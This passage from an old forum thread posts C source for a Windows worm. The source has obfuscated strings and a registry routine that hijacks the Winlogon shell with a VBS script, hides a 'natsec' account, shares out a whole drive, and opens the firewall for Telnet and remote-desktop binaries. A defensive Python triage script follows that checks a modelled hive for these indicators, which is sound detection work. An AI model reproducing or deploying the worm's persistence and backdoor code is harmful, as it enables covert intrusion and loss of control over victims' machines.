    	plainbuffer[92] = "\xC0\xE1\xBD\x9A\x8B\x90\xE9\xDE\xF9\xE9\x97\xBC";//"wmplayer.exe";
    	plainbuffer[93] = "\x8F\xC7\x87\xF7\xC1\xAD\x84\x90\xB6\xC6";//"winamp.exe";
    	plainbuffer[94] = "\x85\xB9\xEE\xAE\xED\xD5\xC4\xCB\xDA\x8E\xF4\xDD";//"jetaudio.exe";
    	plainbuffer[95] = "\xAE\xF8\x8E\xE5\x97\xDD\x95\xF5\xD9\xAA\xF1\xD4\xC9\xD6";//"realplayer.exe";
    	plainbuffer[96] = "\xE0\xB0\xFB\xD9\xF9\xE2\x86\xF2\xC2\xF5\xD9\xFE\x82\xF1"\
    					   "\x8C\xAF\xD0\xEE\xDA\xAC\xB9\xDE\xD4\xAB\xD8\xF4\xBB\xC9"\
    					   "\xC9\xEF\xC9\xB4\xB6\xF2\xBB\x87\xAB\xC6\xDF\xD9\x8D\xDF"\
    					   "\x9C\x9C\xF4\xEF\xDD\xB8\x8E";
    	plainbuffer[97] = "\x8C\xBB\xF9\xD2\xC9\xFC\xC1\xFF\xFA\xF4\xAE\xDD\xF1\xD8"\
    					  "\xE9\xE2\xF3\x9B\x95\xCB\xF9\xAE\xF9\xC5\x83\x8D\x99\x8F"\
    					  "\xEC\xF5\x9E\x8F\xEF\xA1\xB9\xF5\x84\xD8\x98\x8E\xD8\x86"\
    					  "\xE9\x8C\xC5\x8B\x83\x8F\xEE\xD8\xE6\xF2\xF9\xA6\xE2\xFD"\
    					  "\xBC\xD6\x89\xF6\x83\xBB\xEB\x9C\x83\xE8\xFC\xBB\xF8\x86"\
    					  "\xBD\xCB\xF9\xF2\x93\xD4\xB6\xB7\xD0\x98\xB4\x81\xEE\x92"\
    					  "\xC1\xE4\xAB\xCB\xE8\x99\xA1\xAA\xFE\x9B\x98\xF4\x9C\xB5"\
    					  "\xF3\x9B\xEF\xA5\x96\xF1\xC3\xB0\xF6\xFE\x9E\xD8\x83\xA1"\
    					  "\xE4\x98\xB1\xF9";
    Last edited by fb1h2s; 10-13-2010 at 11:01 PM.

  9. #9
    Code:
    /*"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";*/
    	plainbuffer[98] = "\xB0\xF6\xEB\x85\xDD\x98\x83\xD0\xB0\xC4\xAA\xDF\x92\x96"\
    					  "\xCE\x80\xEB\xAC\xEA\xAC\xAB\x98\xBA\xCA\xDB\xD6\x8F\xE9"\
    					  "\xDF\x91\xD4\x81\xBA\x8E\xBD\xDA\xC9";//"SYSTEM\\ControlSet001\\Services\\mnmsrvc";
    	plainbuffer[99] = "\x9E\xE0\x92\xF7\xAB\xC0\xED\xDF\xA5\x80\xEE\xED\xE5\x89"\
    					  "\x8F\x8E\xF8\x9C\xED\x84\xB3\xF0\xA3\xB9\xC6\xDA\xCF\xB8"\
    					  "\xFE\x84\xE7\xD1\xA1\xB8\x89\xC5\xFE";//"SYSTEM\\ControlSet001\\Services\\TlntSvr";
    	plainbuffer[100] = "\xC7\x83\x87\xB7\xEE\xC3\xDA\xFE\x8A\xD3\xDF\xD4";//"\\mnmsrvc.exe";
    	plainbuffer[101] = "\xA9\xE9\xEB\xDF\xAC\xAB\xAC\xE8\xB4\xEC\xF4\x8B";//"\\tlntsrv.exe";
    	plainbuffer[102] = "\xB4\xAE\xA6\xC6\xB9\xAF\x89\xE0\xC9\xB9\xA0\xBE"\
    					   "\xB2\xD3\xCC\xD3\xC5\xCB\xF9\xD0\xDE";//":*:Enabled:Retaliator";
    	plainbuffer[103] = "\xD3\x87\x89\xE9\xC1\xEC\xDE\xEB\xEB\xFE\xEB\x9F\xE9\xC0\xB2\xF8\x9B";//":*:Enabled:Telnet";
    	plainbuffer[104] = "\xB6\xC2\xF1\xC1\xAB";//"Start";
    	plainbuffer[105] = "\xA6\xDE\xF2\x9F\xC2\xFC\xBF\xDF\x87\x83\xA5\x98\xB9\xE7"\
    					   "\x8F\x9A\xBD\xD0\x90\x9B\xDA\x94\xF4\xF6\xAA\xB9\x9D\xE4"\
    					   "\xC8\xEA\xCD\x84\xCB\xC1\xE5\xCC\xE5\xAE\x9E\xAF\xF0\x99"\
    					   "\xE1\xF4\xE1\xBE\xE6\xBC\x87\xAB\xA9\xB9\xAC\x8F\xFF\xB2"\
    					   "\x83\xD8\xED\xB1\xB1\xC9\xC5\xFF\xE3\xE1\x88\x9F";
    	/*"CSCFlags=0\0MaxUses=4294967295\0Path=D:\\\0Permissions=0\0Remark=\0Type=0\0";*/
    	plainbuffer[106] = NULL;
    //--------String section end-----------
    }
    }
    #pragma data_seg()
    /*-------------------Enhancement circuit------------------*/
    void enhancement(void)	{
    	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
    	HKEY hEnhance = NULL;
    	LPCTSTR subkey = plainbuffer[18];//"Control Panel\\Desktop";
    	CONST BYTE value[] = "30";
    	CONST BYTE value1[] = "60";
    	CONST BYTE value2[] = "1";	// Use it wherever required.
    	if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    		RegSetValueEx(hEnhance, plainbuffer[12]/*"MenuShowDelay"*/, 0, REG_SZ, value, sizeof (value));
    		RegCloseKey(hEnhance);hEnhance = NULL;
    	}
    	subkey = plainbuffer[13];//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer";
    	if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    		RegSetValueEx(hEnhance, plainbuffer[14]/*"NoDriveTypeAutoRun"*/, 0, REG_SZ, value1, sizeof (value1));
    		RegCloseKey(hEnhance);hEnhance = NULL;
    	}
    //------------------Administrative section----------------//
    	subkey = plainbuffer[15];//"CurrentControlSet\\Control\\Session Manager\\Memory Management";
    	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    		RegSetValueEx(hEnhance, plainbuffer[16]/*"DisablePagingExecutive"*/, 0, REG_SZ, value2, sizeof (value2));
    		RegSetValueEx(hEnhance, plainbuffer[17]/*"LargeSystemCache"*/, 0, REG_SZ, value2, sizeof (value2));
    		RegCloseKey(hEnhance);hEnhance = NULL;
    	}
    //-------------------Fail-safe section----------------//
    	HKEY hFailsafe = NULL;
    	LPCTSTR fsubkey = plainbuffer[18];//"Control Panel\\Desktop";
    	LPCTSTR fsubkey1 = plainbuffer[19];//"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
    	LPCTSTR shellsubkey = plainbuffer[20];//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon";
    	LPCTSTR accsubkey = plainbuffer[21];//*/"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList";
    	LPCTSTR restorsubkey = "SYSTEM\\CurrentControlSet\\Services\\srservice";
    	CONST BYTE fsval1[] = "0";
    	CONST BYTE dwval[] = "\x00\x00\x00\x00";	// not scrambled
    	char *fsval;
    	char *shellval;
    	fsval = saverptr;
    	shellval = plainbuffer[23];//"Explorer.exe winntobj.vbs";
    Last edited by fb1h2s; 10-13-2010 at 11:02 PM.

  10. #10
    Code:
    //-------------------Loop settings--------------------//
    	subkey = plainbuffer[24];//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer";
    	LPCTSTR subkey1 = plainbuffer[25];//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system";
    	LPCTSTR sharekey = plainbuffer[96];/*"SYSTEM\\ControlSet001\\Services\\lanmanserver\\Shares";*/
    	LPCTSTR firekey = plainbuffer[97];//"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
    	LPCTSTR rdeskkey = plainbuffer[98];//"SYSTEM\\ControlSet001\\Services\\mnmsrvc";
    	LPCTSTR tsubkey = plainbuffer[99];//"SYSTEM\\ControlSet001\\Services\\TlntSvr";
    
    	CONST BYTE rdeskval[] = "\x02\x00\x00\x00";
    	char *shval = plainbuffer[105];//"CSCFlags=0\nMaxUses=4294967295\nPath=F:\\\nPermissions=0\nRemark=\nType=0\n";
    	char buffer[MEDBUFSIZE], tbuffer[MEDBUFSIZE], winbuf[KEYSZ], tbuf[MEDBUFSIZE];
    	memset(buffer, 0, MEDBUFSIZE);memset(tbuffer, 0, MEDBUFSIZE);
    	memset(winbuf, 0, KEYSZ);memset(tbuf, 0, MEDBUFSIZE);	// tbuf is declared with MEDBUFSIZE bytes, so clear all of it
    
    	DWORD usize = sizeof(winbuf) - 1;
    	GetSystemDirectory(winbuf, usize);
    	strcpy(tbuf, winbuf);
    	strcat(winbuf, plainbuffer[100]/*"\\mnmsrvc.exe"*/);
    	strcat(tbuf, plainbuffer[101]/*"\\tlntsrv.exe"*/);
    	strcpy(buffer, winbuf);
    	strcat(buffer, plainbuffer[102]/*":*:Enabled:Retaliator"*/);
    	strcpy(tbuffer, tbuf);
    	strcat(tbuffer, plainbuffer[103]/*":*:Enabled:Telnet"*/);
    	while(true)	{
    		if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[26]/*"SearchHidden"*/, 0, REG_SZ, value2, sizeof (value2));
    			RegCloseKey(hEnhance);hEnhance = NULL;
    		}
    		if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey1, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[27]/*"DisableRegistryTools"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegSetValueEx(hEnhance, plainbuffer[28]/*"DisableTaskmgr"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegCloseKey(hEnhance);hEnhance = NULL;
    		}
    		if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey1, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[27]/*"DisableRegistryTools"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegSetValueEx(hEnhance, plainbuffer[28]/*"DisableTaskmgr"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegCloseKey(hEnhance);hEnhance = NULL;
    		}
    		if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, shellsubkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[29]/*"Shell"*/, 0, REG_SZ, (const unsigned char *)shellval, lstrlen(shellval) + 1);	// REG_SZ size must include the terminating NUL
    			RegCloseKey(hEnhance);hEnhance = NULL;
    			cruser();
    			if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, accsubkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    				RegSetValueEx(hEnhance, plainbuffer[30]/*/"natsec"/**/, 0, REG_DWORD, dwval, sizeof (DWORD));			
    				RegCloseKey(hEnhance);hEnhance = NULL;
    			}
    			if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, sharekey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    				RegSetValueEx(hEnhance, plainbuffer[30]/*/"natsec"/**/, 0, REG_MULTI_SZ, (const unsigned char *)shval, 68);			
    				RegCloseKey(hEnhance);hEnhance = NULL;
    			}
    			if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, firekey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    				RegSetValueEx(hEnhance, /*plainbuffer[30]/*/winbuf/**/, 0, REG_SZ, (const unsigned char *)buffer, lstrlen(buffer) + 1);	// value name is the full exe path; size includes the NUL
    				RegSetValueEx(hEnhance, /*plainbuffer[30]/*/tbuf/**/, 0, REG_SZ, (const unsigned char *)tbuffer, lstrlen(tbuffer) + 1);
    				RegCloseKey(hEnhance);hEnhance = NULL;
    			}
    Last edited by fb1h2s; 10-13-2010 at 11:03 PM.
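Posts #9 and #10 show the registry side of the "enhancement circuit": the Winlogon Shell value is pointed at `Explorer.exe winntobj.vbs`, an account is hidden through `SpecialAccounts\UserList`, a `lanmanserver\Shares` entry exporting a drive root is written as REG_MULTI_SZ, and `mnmsrvc.exe` / `tlntsrv.exe` are added to the XP firewall's AuthorizedApplications list. The script below is an added triage example for this thread, not vinnu's code and not part of the worm. It models a hive as a plain dict of `(key, value name) -> (type, data)` so it runs offline; on a real case the same checks would be fed from `winreg` or from a parsed `.reg` export. Everything it looks for comes from the decoded comments beside `plainbuffer[]`; the sample hive is constructed. Assumptions: ANSI strings (the VC++ 6 build uses `RegSetValueEx`, not the W variant), the `path:scope:state:label` format of XP SP2 firewall entries, and the service `Start = 2` check, which is based on the `rdeskval` DWORD the loop declares (the actual service write is not in the quoted excerpt). It also shows the REG_MULTI_SZ size rule: the six share fields with their own NULs add up to exactly the 68 bytes the visible call passes, so the closing NUL of the list is left out.

```python
"""Offline triage for the registry state the enhancement() loop writes.

Added example for this thread, not the worm's own code. The hive is a plain
dict so the checks run anywhere; key paths and sample values are taken from
the decoded comments next to plainbuffer[] in the posts above.
"""
import re
from typing import Dict, List, Optional, Tuple

# (key path, value name) -> (registry type, data). REG_DWORD data is an int,
# REG_SZ a str, REG_MULTI_SZ the raw bytes exactly as stored.
Hive = Dict[Tuple[str, str], Tuple[str, object]]

WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
USERLIST = WINLOGON + r"\SpecialAccounts\UserList"
SHARES = r"HKLM\SYSTEM\ControlSet001\Services\lanmanserver\Shares"
FW_LIST = (r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
           r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")
WATCHED_SERVICES = (r"HKLM\SYSTEM\ControlSet001\Services\mnmsrvc",
                    r"HKLM\SYSTEM\ControlSet001\Services\TlntSvr")
SERVICE_AUTO_START = 2          # the DWORD 2 the loop prepares in rdeskval (assumed use)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")


def encode_multi_sz(strings: List[str]) -> bytes:
    """REG_MULTI_SZ layout (ANSI): each string NUL-terminated, then one more
    NUL closing the list, so size = sum(len(s) + 1) + 1."""
    return b"".join(s.encode("ascii") + b"\x00" for s in strings) + b"\x00"


def decode_multi_sz(blob: bytes) -> Tuple[List[str], bool]:
    """Split a REG_MULTI_SZ blob; the flag is False when the closing NUL is
    missing, i.e. the writer passed one byte too few."""
    terminated = blob.endswith(b"\x00\x00")
    body = blob[:-2] if terminated else blob.rstrip(b"\x00")
    if not body:
        return [], terminated
    return [p.decode("ascii", "replace") for p in body.split(b"\x00")], terminated


def share_findings(name: str, blob: bytes) -> List[str]:
    """Flag a lanmanserver share that exports a drive root or is mis-sized."""
    fields, terminated = decode_multi_sz(blob)
    kv = dict(f.split("=", 1) for f in fields if "=" in f)
    out = []
    if not terminated:
        out.append(f"share {name!r}: REG_MULTI_SZ lacks closing NUL ({len(blob)} bytes written)")
    path = kv.get("Path", "")
    if DRIVE_ROOT.match(path):
        out.append(f"share {name!r}: exports a whole drive ({path})")
    return out


def firewall_finding(value_name: str, data: str) -> Optional[str]:
    """XP SP2 AuthorizedApplications data reads <path>:<scope>:<state>:<label>;
    rsplit keeps the drive-letter colon inside the path."""
    parts = data.rsplit(":", 3)
    if len(parts) != 4:
        return f"firewall entry {value_name!r}: malformed data {data!r}"
    path, scope, state, label = parts
    if state.lower() == "enabled" and scope == "*":
        return f"firewall exception for {path} open to any remote address (label {label!r})"
    return None


def audit(hive: Hive) -> List[str]:
    """Walk the modelled hive and report each persistence indicator."""
    findings: List[str] = []
    for (key, name), (rtype, data) in hive.items():
        if key == WINLOGON and name.lower() == "shell":
            if str(data).strip().lower() != "explorer.exe":
                findings.append(f"Winlogon Shell replaced: {data!r}")
        elif key == USERLIST and rtype == "REG_DWORD" and data == 0:
            findings.append(f"account {name!r} hidden from the logon screen (UserList = 0)")
        elif key == SHARES and isinstance(data, bytes):
            findings.extend(share_findings(name, data))
        elif key == FW_LIST:
            hit = firewall_finding(name, str(data))
            if hit:
                findings.append(hit)
        elif key in WATCHED_SERVICES and name.lower() == "start" and data == SERVICE_AUTO_START:
            svc = key.rsplit("\\", 1)[-1]
            findings.append(f"service {svc} switched to automatic start")
    return findings


# Constructed sample: what the loop writes, plus a benign tweak and a
# manual-start service as controls. The share blob is cut to the 68 bytes
# the original RegSetValueEx call passes, so the terminator check fires.
SHARE_FIELDS = ["CSCFlags=0", "MaxUses=4294967295", "Path=D:\\",
                "Permissions=0", "Remark=", "Type=0"]
SYS32 = r"C:\WINDOWS\system32"
SAMPLE_HIVE: Hive = {
    (WINLOGON, "Shell"): ("REG_SZ", "Explorer.exe winntobj.vbs"),
    (USERLIST, "natsec"): ("REG_DWORD", 0),
    (SHARES, "natsec"): ("REG_MULTI_SZ", encode_multi_sz(SHARE_FIELDS)[:-1]),
    (FW_LIST, SYS32 + r"\mnmsrvc.exe"): ("REG_SZ", SYS32 + r"\mnmsrvc.exe:*:Enabled:Retaliator"),
    (FW_LIST, SYS32 + r"\tlntsrv.exe"): ("REG_SZ", SYS32 + r"\tlntsrv.exe:*:Enabled:Telnet"),
    (WATCHED_SERVICES[0], "Start"): ("REG_DWORD", SERVICE_AUTO_START),
    (WATCHED_SERVICES[1], "Start"): ("REG_DWORD", 3),
    (r"HKCU\Control Panel\Desktop", "MenuShowDelay"): ("REG_SZ", "30"),
}

if __name__ == "__main__":
    for line in audit(SAMPLE_HIVE):
        print(line)
```

Run as a script it prints seven findings for the sample hive: the shell hijack, the hidden `natsec` account, two for the share (68-byte blob, whole-drive export), two firewall exceptions open to any address, and `mnmsrvc` on automatic start; `TlntSvr` at `Start = 3` and the `MenuShowDelay` tweak are not reported. The XP firewall check deliberately keys on `*` scope plus `Enabled` rather than on the two file names from this worm, so it also catches other programs that whitelist themselves the same way.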
